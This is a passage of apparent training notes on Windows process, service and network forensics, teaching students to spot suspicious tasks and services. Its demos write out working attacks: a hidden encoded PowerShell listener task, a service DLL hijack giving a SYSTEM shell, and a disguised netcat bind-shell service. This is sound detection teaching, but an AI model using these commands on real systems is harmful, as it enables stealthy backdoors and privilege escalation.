Microsoft.Management.Infrastructure.CimSystemProperties Unfortunately, the above command doesn’t show you what the scheduled task is actually doing because the Settings are obscured and so are the Triggers. However, this command will show you more: 5.2.2 View Scheduled Tasks In Command Prompt schtasks /query /tn "IchBinBosh" /v /fo list Folder: \ HostName: ADMIN-STATION TaskName: \IchBinBosh Next Run Time: 6/1/2021 5:02:00 PM Status: Ready Logon Mode: Interactive only Last Run Time: 6/1/2021 4:47:00 PM Last Result: 0 Author: ADMIN-STATION\andy.dwyer Task To Run: powershell.exe -win hidden -encode JABMAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAATABpAHMAdABlAG4AZQByACgANgA2ADYANgApADsAJABMAC4AUwB0AGEAcgB0ACgAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADYAMAA= Start In: N/A Comment: N/A Scheduled Task State: Enabled Idle Time: Disabled Power Management: Stop On Battery Mode, No Start On Batteries Run As User: andy.dwyer Delete Task If Not Rescheduled: Disabled Stop Task If Runs X Hours and X Mins: 72:00:00 Schedule: Scheduling data is not available in this format. Schedule Type: One Time Only, Minute Start Time: 4:02:00 PM Start Date: 6/1/2021 End Date: N/A Days: N/A Months: N/A Repeat: Every: 0 Hour(s), 15 Minute(s) Repeat: Until: Time: None Repeat: Until: Duration: Disabled Repeat: Stop If Still Running: Disabled Q: What odd command do we see occurring in the output above? A: Powershell is running encoded strings Q: How do we decode encoded strings? A: Cyberchef website Note: Demo Cyberchef 5.2.3 View Scheduled Tasks in the GUI Windows Default Task Scheduler Sysinternal tool Autoruns. We’ll go over this more in Sysinternal Tools. Microsoft Reference 5.2.4 Autorun Registry Locations Q: What are some Registry keys that can be used for autoruns? Registry Keys Locations, Locations connected with Services. HKLM\Software\Microsoft\Windows\CurrentVerstion\Run - Local Machine HKLM\Software\Microsoft\Windows\CurrentVerstion\RunOnce HKLM\System\CurrentControlSet\Services Remember that the Users have individual Hives with autoruns as well as the Current User. HKCU\Software\Microsoft\Windows\CurrentVerstion\Run - Current User HKCU\Software\Microsoft\Windows\CurrentVerstion\RunOnce HKU\<sid>\Software\Microsoft\Windows\CurrentVerstion\Run - Specific User HKU\<sid>\Software\Microsoft\Windows\CurrentVerstion\RunOnce The order in which services are loaded can be adjusted. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ServiceGroupOrder HKEY_LOCAL_MACHINE\CurrentControlSet\Control\GroupOrderList 5.3 DEMO: Create Task to open listening Port via the PowerShell Process. 5.3.1 Create IchBinBosh task Opens port listening on port 6666 every 15 minutes. 1. In CMD, run the following. schtasks /Create /TN IchBinBosh /SC MINUTE /MO 15 /TR "powershell.exe -win hidden -encode JABMAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAATABpAHMAdABlAG4AZQByACgANgA2ADYANgApADsAJABMAC4AUwB0AGEAcgB0ACgAKQA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADYAMAA=" ----- OR ----- 2. *If the script stops working* - run the following commands instead in Powershell to create a listening port: $command = '$L=New-Object System.Net.Sockets.TcpListener(6666);$L.Start();Start-Sleep -s 60' $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -encodedCommand $encodedCommand 5.3.2 Confirm IchBinBosh exists and View Properties In Command Prompt schtasks /query | select-string -pattern IchBinBosh -Context 2,4 In PowerShell Get-ScheduledTask | Select * | select-string -pattern IchBinBosh -Context 2,4 In GUI Show in either Task Scheduler or AutoRuns. 6. Network Connections 6.1 View Network Connections In PowerShell Show all Connections in the "Established" state. Get-NetTCPConnection -State Established PS C:\Users\andy.dwyer> Get-NetTCPConnection -State Established LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting OwningProcess ------------ --------- ------------- ---------- ----- -------------- ------------- 10.23.0.2 49701 52.177.165.30 443 Established Internet 2988 10.23.0.2 22 10.250.0.15 59038 Established Internet 2944 6.2 View Network Connections in Command Prompt Show netstat help and point out the following: netstat /? -a Displays all connections and listening ports -n Displays addresses and port numbers in numerical form -o Displays the owning process ID (PID) associated with each connection -b Displays the executable involved in creating each connection (must have admin rights) Displays all TCP/UDP connections with ports in numerical form with PID and executable associated to the connections netstat -anob | more andy.dwyer@ADMIN-STATION C:\Users\andy.dwyer>netstat -anob | more Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:22 0.0.0.0:0 LISTENING 2944 [sshd.exe] TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 832 RpcSs [svchost.exe] TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 Can not obtain ownership information TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 304 TermService [svchost.exe] TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 4456 CDPSvc -- More -- 6.3 View Network Connections in the GUI TCPView We will go over this in Sysinternal tools If you want to dig deeper: Microsoft Reference 7. Identifying Abnormalities/Suspicious Activity Q: What are some Abnormal things we could see in a process list? Misspelling of process names and descriptions. Ex. scvhost instead of svchost Directory the process is running out of. Processes that have non-standard listening ports open or ports with SYN/SENT. Like HTTP being used on any port other than 80. (ex. HTTP over port 808 or 880) Multiple processes with the same name that should be unique such as LSASS, SMSS System process with a high PID. Handles or DLLs a process is using Dynamic Link Library A non-standalone program that can be run by (linked to) multiple programs at the same time. Cannot be directly executed. Dependent on an exe to use as an entry point, such as RUNDLL.EXE (a process that calls on the functionality of the DLL) Allows developers to make minor changes without affecting other parts of the program. Microsoft Compromised DLLs DLL Hijacking Q: Which directory are windows executables typically run out of? System Processes run from C:\Windows\System32 Third party processes will run elsewhere. Ex. Chrome runs from C:\Program Files Microsoft Compromised DLLs DLL Hijacking Q: Where’s Waldo??? Using what we’ve learned so far, what stands out about this Task List? System Idle Process 0 Services 0 8 K Unknown NT AUTHORITY\SYSTEM 368:23:24 N/A System 4 Services 0 24 K Unknown N/A 0:13:27 N/A Registry 88 Services 0 46,944 K Unknown N/A 0:00:11 N/A smss.exe 288 Services 0 344 K Unknown N/A 0:00:00 N/A csrss.exe 392 Services 0 1,768 K Unknown N/A 0:00:06 N/A wininit.exe 464 Services 0 876 K Unknown N/A 0:00:00 N/A csrss.exe 476 Console 1 1,872 K Running N/A 0:00:16 N/A winlogon.exe 560 Console 1 3,772 K Unknown N/A 0:00:00 N/A services.exe 576 Services 0 8,756 K Unknown N/A 0:02:28 N/A lsass.exe 604 Services 0 11,980 K Unknown N/A 0:14:15 N/A svchost.exe 716 Services 0 908 K Unknown N/A 0:00:00 N/A fontdrvhost.exe 724 Console 1 2,572 K Unknown N/A 0:00:01 N/A fontdrvhost.exe 736 Services 0 680 K Unknown N/A 0:00:00 N/A svchost.exe 800 Services 0 20,396 K Unknown N/A 0:04:37 N/A svchost.exe 848 Services 0 10,804 K Unknown N/A 0:01:42 N/A svchost.exe 896 Services 0 4,144 K Unknown N/A 0:01:05 N/A dwm.exe 992 Console firefox.exe 2396 Console 1 53,008 K Running ARMY\andy.dwyer 0:00:01 OleMainThreadWndName cmd.exe 4372 Console 1 3,132 K Running ARMY\andy.dwyer 0:00:00 Command Prompt - tasklist /v conhost.exe 4128 Console 1 19,536 K Running ARMY\andy.dwyer 0:00:18 N/A firefox.exe 6952 Console 1 36,340 K Not Responding ARMY\andy.dwyer 0:00:00 OleMainThreadWndName dllhost.exe 6324 Console 1 16,084 K Running ARMY\andy.dwyer 0:00:00 N/A cmd.exe 5788 Console 1 3,204 K Running ARMY\andy.dwyer 0:00:00 C:\windows\system32\cmd.exe conhost.exe 6240 Console 1 15,956 K Running ARMY\andy.dwyer 0:00:00 N/A SecHealthUI.exe 1828 Console 1 54,808 K Running ARMY\andy.dwyer 0:00:03 CicMarshalWnd dllhost.exe 7316 Console 1 9,532 K Running ARMY\andy.dwyer 0:00:00 OleMainThreadWndName bad.exe 3648 Services 0 6,680 K Unknown N/A 0:00:00 N/A conhost.exe 8604 Console 1 17,832 K Running ARMY\andy.dwyer 0:00:00 N/A smartscreen.exe 5916 Console 1 20,268 K Unknown ARMY\andy.dwyer 0:00:00 N/A smss.exe 8972 Console 1 14,412 K Running ARMY\andy.dwyer 0:00:00 Installer Language svchost.exe 8976 Services 0 5,632 K Unknown N/A 0:00:00 N/A WmiPrvSE.exe 9212 Services 0 8,824 K Unknown N/A 0:00:00 N/A reqedit.exe 8760 Console 1 12,556 K Running ARMY\andy.dwyer 0:00:00 PuTTY Configuration tasklist.exe 8308 Console SystemSettingsBroker.exe 5600 Console 1 2,536 K Unknown ARMY\andy.dwyer 0:00:00 N/A explorer.exe 5416 Console 1 19,276 K Running ARMY\andy.dwyer 0:00:30 N/A MsMpEng.exe 6616 Services 0 88,688 K Unknown N/A 0:09:55 N/A regedit.exe 2624 Console 1 3,200 K Running ARMY\andy.dwyer 0:00:00 Registry Editor mmc.exe 3352 Console 1 5,380 K Running ARMY\andy.dwyer 0:00:02 OLEChannelWnd svchost.exe 4200 Services 0 8,716 K Unknown N/A 0:00:01 N/A dllhost.exe 4868 Console 1 6,236 K Running ARMY\andy.dwyer 0:00:00 OleMainThreadWndName powershell_ise.exe 4940 Console 1 406,740 K Running ARMY\andy.dwyer 0:01:20 Windows PowerShell ISE taskhostw.exe 5864 Console 1 7,524 K Running ARMY\andy.dwyer 0:00:00 Task Host Window MicrosoftEdge.exe 6928 Console 1 712 K Running ARMY\andy.dwyer 0:00:00 Microsoft Edge browser_broker.exe 1108 Console 1 972 K Running ARMY\andy.dwyer 0:00:00 OleMainThreadWndName svchost.exe A: High PID duplicate, unfamiliar process name, and misspelling. Two smss.exe, one with a high PID of 8972 bad.exe reqedit.exe 7.1 Demo: Manipulating SMPhost Service and Parameters REQUIRES PAYLOAD.DLL AND NETCAT Microsoft Storage Spaces SMP (smphost) Service Defaults in Windows 10 Storage Spaces is a technology in Windows and Windows Server that can help protect your data from drive failures. It is conceptually similar to RAID, implemented in software. mkdir "C:\windows \" # keep space and quotes. dir # show that our fake windows directory reads as if it was the real windows directory cd "C:\windows \" # change directory to our fake windows folder mkdir "c:\windows \system32 \" # create our fake system32 folder copy payload.dll "c:\windows \system32 \" # copy dll to our fake system32 directory regedit.exe # open gui to visually show students the changes being made HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smphost # locate this service in the registry ObjectName = LocalSystem # Change this value to LocalSystem Parameters -> ServiceDll c:\windows \system32 \payload.dll # Put the location of the malicious Dll in the data field. ( Keep Spacing ) netcat -lvp 7778 # open another command prompt and run nc.exe -lvp 7778 net start smphost # start service and you should get a system shell in your nc.exe window sc.exe queryex smphost # query the smphost service and grab the PID of the service running Get-process | select name,id,path | where {$_.id -eq "PID#"} # show how the malicious service runs as C:\windows\System32\svchost.exe ( hard to find ) reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smphost /s # dump the registry contents and show the changes under the parameters key gci -Recurse -path hklm:\SYSTEM\CurrentControlSet\Services\smphost # Same as previous but in PowerShell fu. whoami # in the netcat window run a whoami to show you are now SYSTEM Q: Why would Malware want to use services to hide itself? How does a service run compared to how a process runs? Services can be used for malicious intent to easily hide malware. When services are set to start at boot, they are able to start any executables attached with them to also start with the service. Unlike a process this is done without interaction from the user. Services.msc - Windows GUI for editing and configuring services. sc - Built in Windows command that can create, modify and delete services. Q: What information are we looking for? Where the service executable %PATH% is started. The Name of the service so you can look in the Registry Keys and in Services.msc for anything that stands out. Look for abnormal executables attached to the service, when the service starts and how, and especially if the service has any network traffic. Also, look at the dependencies and load order group for when it starts as it will be the order it loads and if another server will load it to try to blend in better. A service group is a collection of services that are loaded together at system startup multiple drivers are configured to access the same device then the driver that is loaded first will claim 'ownership' of the device. This driver is then allowed to dictate the terms of shared ownership with other drivers or can retain exclusive control for itself. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ServiceGroupOrder The HKEY_LOCAL_MACHINE\CurrentControlSet\Control\GroupOrderList subkey determines the order in which services within a Service Group are loaded. Services in a Service Group are assigned a tag, a unique numeric value within a Service Group which determines the service load order. Drivers are loaded in the registry’s Load Ordering Group List, followed by drivers not in the list. Keep in mind if a malicious driver was loaded first into let’s say the TCP/IP service which controlled the other legit drivers and dependencies we could hide traffic from even showing up on wireshark. 7.2 Demo: Service configuration post-modification behavior COMMAND LINE For this demo netcat was used and renamed to svchost.exe. Change directory to C:\windows and create a folder named Systme32. Apply hidden attributes to the folder. Copy the netcat.exe to the newly created folder and make sure the name is now svchost.exe Apply hidden attributes to svchost.exe cd c:\windows mkdir Systme32 attrib +h Systme32 copy (path of netcat.exe) c:\windows\systme32\svchost.exe attrib +h svchost.exe Create the malicious service ( DON’T LET THE STUDENTS SEE YOU DO THIS ) This will create a Service named "Service Host" SC Create "Service Host" type=own start=auto error=normal binpath= "cmd /k c:\windows\systme32\svchost.exe -Lvp 443 -e cmd.exe" obj=LocalSystem Create the description value to make the service look more legit 8. Scheduled Tasks reg add "hklm\system\currentcontrolset\services\service host" /v Description /t reg_sz /d "Svchost is essential in the implementation of so-called shared service processes, where a number of services can share a process in order to reduce resource consumption." Don’t forget to start the new service net start "Service Host" Q: So from what we learned earlier what are the first steps to finding the malware? Get-process | select name,id,path If they don’t find the malware pull the netstat list to see if they can find the port. netstat -ano Run netstat -ano and point out the open port 443 it should never be listening Open another command prompt and connect to the open port. Run whoami command to show you now have system level access c:\windows\systme32\svchost.exe 127.0.0.1 443 Search for all non-system32 process first. Will find it faster. Get-ciminstance win32_service | select name, processid, pathname | where {$_.pathname -notmatch “system32”} get-process | select name,id,path | where path -notmatch "system32" Cleanup DEMO netstat -ano | findstr /i "443" #get PID of process 127.0.0.1:443 taskkill /pid <pid_of_process> /f rmdir /s c:\windows\systme32 Summary Today we talked about how to list the Windows operating system processes and explored different ways to make a process execute. We also looked at different ways to follow what a process does during execution, like starting other/new processes. Processes can be made to look like other known good processes in an attempt to be nafarious and we now have a good grasp on how to decypher between the two. Resources Processes Microsoft Reference - Get-Process Microsoft Reference - Get-Ciminstance Services Microsoft Reference - Services.msc Microsoft Reference - Get-Service Microsoft Reference - SC Query Network Connections Netstat for Beginners DLL Info DLLs and Services Microsoft Reference - DLL Microsoft Compromised DLLs DLL Hijacking Sysinternal Tools Microsoft Reference - ProcExp Microsoft Reference - AutoRuns Microsoft Reference - TCPView